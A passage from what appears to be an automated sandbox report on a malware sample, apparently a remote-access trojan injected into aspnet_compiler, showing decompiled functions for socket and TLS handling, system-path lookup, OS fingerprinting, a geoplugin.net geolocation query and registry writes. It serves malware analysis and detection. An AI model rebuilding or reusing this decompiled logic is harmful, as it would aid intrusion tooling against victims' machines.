                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                    • WSAGetLastError.WS2_32 ref: 00404A01
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                    • API String ID: 994465650-2151626615
                    • Opcode ID: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                    • Instruction ID: 4dac077a67aca900205559ee8606d27a3048533bf49cbaad300c4d8012786ffc
                    • Opcode Fuzzy Hash: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                    • Instruction Fuzzy Hash: 5641C5B1F4020177D6047B7A890B96E7A25AB81304B50017FF901226D3EE7DA96587EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00404E06(void* __edx) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t29;
				int _t32;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t51;

				_t48 = __edx;
				_t51 = WaitForSingleObject;
				_t50 = _t44;
				_t29 = WaitForSingleObject( *(_t50 + 0x68), 0xffffffff);
				if( *(_t50 + 4) != 0xffffffff) {
					__imp__#3( *(_t50 + 4)); // executed
					if(_t29 == 0) {
						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
					}
					_t45 = _t50;
					if(E004046D3(_t50) != 0) {
						E004050C4(_t45, _t51, 1);
					}
					if( *((char*)(_t50 + 1)) != 0) {
						E0041F5AB(WaitForSingleObject( *(_t50 + 0x70), 0xffffffff), CloseHandle,  *(_t50 + 0x50), _t48, SetEvent, _t50);
						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
						SetEvent( *(_t50 + 0x70));
						E0041F5AB(WaitForSingleObject( *(_t50 + 0x6c), 0xffffffff), CloseHandle,  *(_t50 + 0x4c), _t48, SetEvent, _t50);
						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
						SetEvent( *(_t50 + 0x6c));
						FindCloseChangeNotification( *(_t50 + 0x70)); // executed
						FindCloseChangeNotification( *(_t50 + 0x6c)); // executed
						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
					}
					SetEvent( *(_t50 + 0x68));
					_t32 = CloseHandle( *(_t50 + 0x68));
				} else {
					SetEvent( *(_t50 + 0x68));
					_t32 = CloseHandle( *(_t50 + 0x68));
				}
				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
				return _t32;
			}














                    0x00404e06
                    0x00404e09
                    0x00404e11
                    0x00404e18
                    0x00404e1e
                    0x00404e3a
                    0x00404e42
                    0x00404e44
                    0x00404e44
                    0x00404e48
                    0x00404e51
                    0x00404e55
                    0x00404e55
                    0x00404e6a
                    0x00404e76
                    0x00404e7e
                    0x00404e82
                    0x00404e8e
                    0x00404e96
                    0x00404e9a
                    0x00404e9f
                    0x00404ea4
                    0x00404ea6
                    0x00404eaa
                    0x00404eaa
                    0x00404eb1
                    0x00404eb6
                    0x00404e20
                    0x00404e23
                    0x00404e2c
                    0x00404e2c
                    0x00404eb8
                    0x00404ec1

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                    • closesocket.WS2_32(000000FF), ref: 00404E3A
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEvent$ObjectSingleWait$ChangeFindHandleNotification$closesocket
                    • String ID:
                    • API String ID: 4074944092-0
                    • Opcode ID: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                    • Instruction ID: 36cdbf8d69702b382ce25e6a3e5e0fa9723ae9905729ab2d5c1a42a88e4aa4cf
                    • Opcode Fuzzy Hash: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                    • Instruction Fuzzy Hash: D6211A71044B00AFD7216B26DC49A1BBBA6FF40326F104A3DE1A611AF1CB75A851DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CF38 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1358 40cf38-40cf5d call 401f66 1361 40cf63 1358->1361 1362 40d087-40d0ad call 401ee4 GetLongPathNameW call 40415e 1358->1362 1363 40d072 1361->1363 1364 40d063-40d068 call 43a99f 1361->1364 1365 40cf74-40cf82 call 41a10f call 401ef3 1361->1365 1366 40cf95-40cf9a 1361->1366 1367 40d055-40d05a 1361->1367 1368 40cfa9-40cfb0 call 41ab12 1361->1368 1369 40cf6a-40cf6f 1361->1369 1370 40d05c-40d061 1361->1370 1371 40cf9f-40cfa4 1361->1371 1388 40d0b2-40d11f call 40415e call 40d2d5 call 402f85 * 2 call 401ee9 * 5 1362->1388 1374 40d077-40d07c call 43a99f 1363->1374 1379 40d06d-40d070 1364->1379 1392 40cf87 1365->1392 1366->1374 1367->1374 1383 40cfb2-40d002 call 40415e call 43a99f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1368->1383 1384 40d004-40d050 call 40415e call 43a99f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1368->1384 1369->1374 1370->1374 1371->1374 1385 40d07d-40d082 call 4086cb 1374->1385 1379->1363 1379->1385 1397 40cf8b-40cf90 call 401ee9 1383->1397 1384->1392 1385->1362 1392->1397 1397->1362
                    C-Code - Quality: 86%
                    			E0040CF38(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				void* __ebp;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;
				void* _t82;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				E00401F66(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t86 = _t36 - 8;
				if(_t36 <= 8) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M0040D120))) {
						case 0:
							_push(L"Temp");
							goto L15;
						case 1:
							__ecx =  &_v620;
							__eax = E0041A10F(__ebx,  &_v620, __edx);
							__ecx =  &_v644;
							__eax = E00401EF3( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L15;
						case 3:
							_push(L"WinDir");
							goto L15;
						case 4:
							__eax = E0041AB12(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00402F85( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E00401EE9();
								__ecx =  &_v608;
								__eax = E00401EE9();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00402F85( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E00401EE9();
								__ecx =  &_v608;
								__eax = E00401EE9();
								__ecx =  &_v584;
								L5:
								__eax = E00401EE9();
								goto L17;
							}
							L18:
						case 5:
							L14:
							_push(L"ProgramFiles");
							goto L15;
						case 6:
							_push(L"AppData");
							goto L15;
						case 7:
							_push(L"UserProfile");
							L15:
							_t51 = E0043A99F(_t54, _t57, _t86);
							goto L16;
						case 8:
							__eax = E0043A99F(__ebx, __ecx, __eflags, L"ProgramData"); // executed
							__eflags = __eax;
							if(__eflags == 0) {
								goto L14;
							}
							L16:
							L004086CB(_t54,  &_v644, _t73, _t51);
							goto L17;
					}
				}
				L17:
				__imp__GetLongPathNameW(E00401EE4( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040415E(_t54,  &_v560, _t73, _t82, _a4);
				_t40 = E0040415E(_t54,  &_v636, _t73, _t82, "\\");
				E00402F85(_t77, E00402F85( &_v600, E0040D2D5(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				return _t77;
				goto L18;
			}





























                    0x0040cf38
                    0x0040cf47
                    0x0040cf49
                    0x0040cf4f
                    0x0040cf57
                    0x0040cf5a
                    0x0040cf5d
                    0x0040cf63
                    0x00000000
                    0x0040cf6a
                    0x00000000
                    0x00000000
                    0x0040cf74
                    0x0040cf78
                    0x0040cf7e
                    0x0040cf82
                    0x00000000
                    0x00000000
                    0x0040cf95
                    0x00000000
                    0x00000000
                    0x0040cf9f
                    0x00000000
                    0x00000000
                    0x0040cfa9
                    0x0040cfae
                    0x0040cfb0
                    0x0040d009
                    0x0040d018
                    0x0040d01f
                    0x0040d028
                    0x0040d02a
                    0x0040d02e
                    0x0040d035
                    0x0040d039
                    0x0040d03e
                    0x0040d042
                    0x0040d047
                    0x0040d04b
                    0x0040cf87
                    0x0040cf87
                    0x00000000
                    0x0040cfb2
                    0x0040cfb7
                    0x0040cfc6
                    0x0040cfcd
                    0x0040cfd6
                    0x0040cfd8
                    0x0040cfdc
                    0x0040cfe3
                    0x0040cfe7
                    0x0040cfec
                    0x0040cff0
                    0x0040cff5
                    0x0040cff9
                    0x0040cffe
                    0x0040cf8b
                    0x0040cf8b
                    0x00000000
                    0x0040cf8b
                    0x00000000
                    0x00000000
                    0x0040d072
                    0x0040d072
                    0x00000000
                    0x00000000
                    0x0040d055
                    0x00000000
                    0x00000000
                    0x0040d05c
                    0x0040d077
                    0x0040d077
                    0x00000000
                    0x00000000
                    0x0040d068
                    0x0040d06e
                    0x0040d070
                    0x00000000
                    0x00000000
                    0x0040d07d
                    0x0040d082
                    0x00000000
                    0x00000000
                    0x0040cf63
                    0x0040d087
                    0x0040d09e
                    0x0040d0ad
                    0x0040d0bc
                    0x0040d0e4
                    0x0040d0ee
                    0x0040d0f7
                    0x0040d100
                    0x0040d109
                    0x0040d112
                    0x0040d11f
                    0x00000000

                    APIs
                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040D09E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                    • API String ID: 82841172-425784914
                    • Opcode ID: 1c40dfc39a49de24788d75347d487970fcdc56dabf44de8dd18c5321d483f06d
                    • Instruction ID: 6b614a152261b5ac042ce2f1e9ed8ca0f13a8186c1863ac34b2aa9a3c23cc976
                    • Opcode Fuzzy Hash: 1c40dfc39a49de24788d75347d487970fcdc56dabf44de8dd18c5321d483f06d
                    • Instruction Fuzzy Hash: A24155715082009AC204F761D852DAFB3E8AE9075CF10053FF586760E2EE789A4AC65F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419E1E Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1487 419e1e-419e75 call 41ab12 call 41288e call 401fc2 call 401fb8 call 406155 1498 419e77-419e86 call 41288e 1487->1498 1499 419eb8-419ec1 1487->1499 1504 419e8b-419ea2 call 401f8b StrToIntA 1498->1504 1500 419ec3-419ec8 1499->1500 1501 419eca 1499->1501 1503 419ecf-419eda call 40535d 1500->1503 1501->1503 1509 419eb0-419eb3 call 401fb8 1504->1509 1510 419ea4-419ead call 41b874 1504->1510 1509->1499 1510->1509
                    C-Code - Quality: 74%
                    			E00419E1E(void* __ecx, void* __eflags) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t7;
				void* _t8;
				int _t15;
				void* _t25;
				void* _t31;
				void* _t32;
				void* _t33;

				_t7 = E0041AB12(__ecx);
				_push(__ecx);
				_t19 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
				 *0x472ae4 = _t7;
				_t29 = 0x80000002;
				_t8 = E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
				E00401FC2(0x473950, 0x80000002, _t31, _t8);
				E00401FB8();
				_t32 = E00406155(0x473950, "10", 0);
				if(_t32 != 0xffffffff) {
					_push(0x473950);
					_t29 = 0x80000002;
					E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuildNumber"); // executed
					_t15 = StrToIntA(E00401F8B( &_v28));
					_t39 = _t15 - 0x55f0;
					if(_t15 >= 0x55f0) {
						_t5 = _t32 + 1; // 0x1
						 *((char*)(E0041B874(0x80000002, _t33, _t39, _t5))) = 0x31;
					}
					E00401FB8();
				}
				_t25 = 0x473950;
				if( *0x472ae4 == 0) {
					_push(" (32 bit)");
				} else {
					_push(" (64 bit)");
				}
				return L0040535D(_t19, _t25, _t29, 0x473950, _t33);
			}















                    0x00419e27
                    0x00419e2c
                    0x00419e32
                    0x00419e37
                    0x00419e3d
                    0x00419e45
                    0x00419e55
                    0x00419e5d
                    0x00419e70
                    0x00419e75
                    0x00419e77
                    0x00419e7e
                    0x00419e86
                    0x00419e97
                    0x00419e9d
                    0x00419ea2
                    0x00419ea4
                    0x00419ead
                    0x00419ead
                    0x00419eb3
                    0x00419eb3
                    0x00419ebf
                    0x00419ec1
                    0x00419eca
                    0x00419ec3
                    0x00419ec3
                    0x00419ec3
                    0x00419eda

                    APIs
                      • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                      • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                      • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                      • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                    • StrToIntA.SHLWAPI(00000000,0046A9AC,00000000,00000000,00000000,00473298,00000003,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 00419E97
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue
                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$P9G$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    • API String ID: 1866151309-2787534724
                    • Opcode ID: 5743bde162c7f15c4a6a80105cc2fc1329e71675b8daac915826904b96160fdf
                    • Instruction ID: 2d8a69e0546d05ecafa38ff55f4d44f4812dfb7c18b39c611b81bdfdf30cbcec
                    • Opcode Fuzzy Hash: 5743bde162c7f15c4a6a80105cc2fc1329e71675b8daac915826904b96160fdf
                    • Instruction Fuzzy Hash: C311E370A4020116C704B3659C5BEEF7A1D8790305F64053FF906B61D2EB7C1C9686AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419EDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1514 419edb-419f1e call 4020bf call 43a620 InternetOpenW InternetOpenUrlW 1519 419f20-419f41 InternetReadFile 1514->1519 1520 419f43-419f63 call 402097 call 403356 call 401fb8 1519->1520 1521 419f67-419f6a 1519->1521 1520->1521 1522 419f70-419f7d InternetCloseHandle * 2 call 43a61b 1521->1522 1523 419f6c-419f6e 1521->1523 1527 419f82-419f8c 1522->1527 1523->1519 1523->1522
                    C-Code - Quality: 90%
                    			E00419EDB(void* __ecx, void* __edx) {
				WCHAR* _v36;
				long _v80;
				char _v88;
				int _v92;
				intOrPtr _v96;
				void* _v100;
				int _v104;
				intOrPtr _v108;
				void* __ebx;
				void* __ebp;
				void* _t12;
				void* _t13;
				void* _t14;
				int _t16;
				void* _t24;
				intOrPtr _t27;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t37;

				_t32 = __edx;
				_t25 = __ecx;
				_t24 = __ecx;
				E004020BF(__ecx, __ecx);
				_push(0xffff);
				_v36 = 0;
				_t12 = E0043A620(_t25); // executed
				_t33 = _t12; // executed
				_t13 = InternetOpenW(0, 1, 0, 0, 0); // executed
				_t37 = _t13;
				_t14 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0); // executed
				_t35 = _t14;
				do {
					_v80 = _v80 & 0x00000000;
					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80); // executed
					_t27 = _v96;
					_v92 = _t16;
					_t40 = _t27;
					if(_t27 != 0) {
						L00403356(E00402097(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
						E00401FB8();
						_t27 = _v108;
						_t16 = _v104;
					}
				} while (_t16 == 1 && _t27 != 0);
				InternetCloseHandle(_t35);
				InternetCloseHandle(_t37);
				L0043A61B(_t33); // executed
				return _t24;
			}























                    0x00419edb
                    0x00419edb
                    0x00419ee2
                    0x00419ee4
                    0x00419eeb
                    0x00419ef0
                    0x00419ef4
                    0x00419f00
                    0x00419f02
                    0x00419f10
                    0x00419f18
                    0x00419f1e
                    0x00419f20
                    0x00419f20
                    0x00419f31
                    0x00419f37
                    0x00419f3b
                    0x00419f3f
                    0x00419f41
                    0x00419f51
                    0x00419f5a
                    0x00419f5f
                    0x00419f63
                    0x00419f63
                    0x00419f67
                    0x00419f77
                    0x00419f7a
                    0x00419f7d
                    0x00419f8c

                    APIs
                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419F02
                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00419F18
                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00419F31
                    • InternetCloseHandle.WININET(00000000), ref: 00419F77
                    • InternetCloseHandle.WININET(00000000), ref: 00419F7A
                    Strings
                    • http://geoplugin.net/json.gp, xrefs: 00419F12
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead
                    • String ID: http://geoplugin.net/json.gp
                    • API String ID: 3121278467-91888290
                    • Opcode ID: 52e2a2ac24d6a613dbec00c9a6df390d54a01e79d0913aa62208e80b44f72806
                    • Instruction ID: a70ecc99465d7097496f885b09ad11ab3779813296453655fb12c4e4d745da0f
                    • Opcode Fuzzy Hash: 52e2a2ac24d6a613dbec00c9a6df390d54a01e79d0913aa62208e80b44f72806
                    • Instruction Fuzzy Hash: FD11C8311093127BD224AB169C49DBF7F9CEF86765F00043EF945E2291DB68DC45C6BA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404CA3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 94%
                    			E00404CA3(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
				char _v24;
				char _v28;
				char _v40;
				void* _v44;
				char _v48;
				signed int _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v76;
				char _v80;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t61;
				void* _t65;
				struct _SECURITY_ATTRIBUTES* _t67;
				signed int _t73;
				void* _t90;
				_Unknown_base(*)()* _t92;
				void* _t94;
				void* _t96;
				void* _t97;
				void* _t98;

				_t90 = __edx;
				_t97 =  &_v56;
				_v52 = _v52 & 0x00000000;
				_t94 = __ecx;
				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
				E004020BF(_t65,  &_v48);
				_t7 = _t94 + 0x58; // 0x472f38
				_t35 = _t7;
				_t92 = _a4;
				while(E00404EDB(_t94, E00401F8B(_t92),  &_v52, _t35) != 0) {
					_t73 =  *(_t94 + 0x30) & 0x000000ff;
					_a12 = _t73;
					_t96 = _v52 + _t73;
					if(_t96 <= E0040245C()) {
						_t67 = 0;
						__eflags = 0;
					} else {
						_t67 = 1;
						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040245C();
					}
					if(_t67 == 0) {
						E00401FC2( &_v60, _t90, _t94, E00404182(_t92,  &_v24, _a12, 0xffffffff));
						E00401FB8();
						E00401FC2( &_v76, _t90, _t94, E00404182( &_v64,  &_v40, 0, _v68));
						E00401FB8();
						_t103 = _t67;
						if(_t67 != 0) {
							_t25 = _t94 + 0xc; // 0x472eec
							E00401FA0(_t25,  &_v80);
							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a4, _t94, 0, 0); // executed
							WaitForSingleObject( *(_t94 + 0x24), 0xffffffff);
							FindCloseChangeNotification( *(_t94 + 0x24)); // executed
						} else {
							_t98 = _t97 - 0x18;
							E004020D6(_t67, _t98, _t90, _t103,  &_v80);
							_a4(_t94);
							_t97 = _t98 + 0x1c;
						}
						E00401FC2(_t92, _t90, _t94, E00404182(_t92,  &_v28, _t96, 0xffffffff));
						E00401FB8();
						_t61 = E0040245C();
						_t32 = _t94 + 0x58; // 0x472f38
						_t35 = _t32;
						if(_t61 != 0) {
							continue;
						}
					}
					break;
				}
				return E00401FB8();
			}





























                    0x00404ca3
                    0x00404ca3
                    0x00404ca6
                    0x00404cae
                    0x00404cb5
                    0x00404cb9
                    0x00404cc2
                    0x00404cc2
                    0x00404cc5
                    0x00404cc9
                    0x00404ce6
                    0x00404cee
                    0x00404cf2
                    0x00404cfd
                    0x00404d11
                    0x00404d11
                    0x00404cff
                    0x00404d01
                    0x00404d0c
                    0x00404d0c
                    0x00404d15
                    0x00404d32
                    0x00404d3b
                    0x00404d59
                    0x00404d62
                    0x00404d6b
                    0x00404d6d
                    0x00404d85
                    0x00404d88
                    0x00404d99
                    0x00404d9c
                    0x00404da7
                    0x00404db2
                    0x00404dbb
                    0x00404d6f
                    0x00404d6f
                    0x00404d75
                    0x00404d7b
                    0x00404d7f
                    0x00404d7f
                    0x00404dd3
                    0x00404ddc
                    0x00404de3
                    0x00404dea
                    0x00404dea
                    0x00404ded
                    0x00000000
                    0x00000000
                    0x00404ded
                    0x00000000
                    0x00404d15
                    0x00404e03

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00472F38), ref: 00404D93
                    • CreateThread.KERNELBASE ref: 00404DA7
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DBB
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                    • String ID: Cqt
                    • API String ID: 2579639479-953143165
                    • Opcode ID: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                    • Instruction ID: dba95858f974454461b1e2e40e9edd510e178e98119d07c53f81cbb5064a2bb1
                    • Opcode Fuzzy Hash: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                    • Instruction Fuzzy Hash: 524194712083016BC711FB61DD55D6FB7EDAFD4314F400A3EB982A22E2DB3899098666
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412A57 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1599 412a57-412a6e RegCreateKeyA 1600 412a70-412aa5 call 40245c call 401f8b RegSetValueExA RegCloseKey 1599->1600 1601 412aa7 1599->1601 1603 412aa9-412ab7 call 401fb8 1600->1603 1601->1603
                    C-Code - Quality: 77%
                    			E00412A57(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E0040245C();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F8B( &_a8), _t15); // executed
					RegCloseKey(_v8); // executed
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				E00401FB8();
				return _t20;
			}









                    0x00412a5a
                    0x00412a5b
                    0x00412a66
                    0x00412a6e
                    0x00412aa7
                    0x00412a70
                    0x00412a74
                    0x00412a8e
                    0x00412a99
                    0x00412aa2
                    0x00412aa2
                    0x00412aac
                    0x00412ab7

                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                    • RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                    • RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    • Opcode ID: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                    • Instruction ID: 065d1f4c68480eb08966ef6070b87cad1f8bbd79d217faba3f808efe567dd641
                    • Opcode Fuzzy Hash: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                    • Instruction Fuzzy Hash: 99F0F632140208BFCB00AFA0ED45DEE376CEF04750F104276BD09A61A2D7359E10DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409A7A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 90%
                    			E00409A7A() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t29;
				void* _t31;
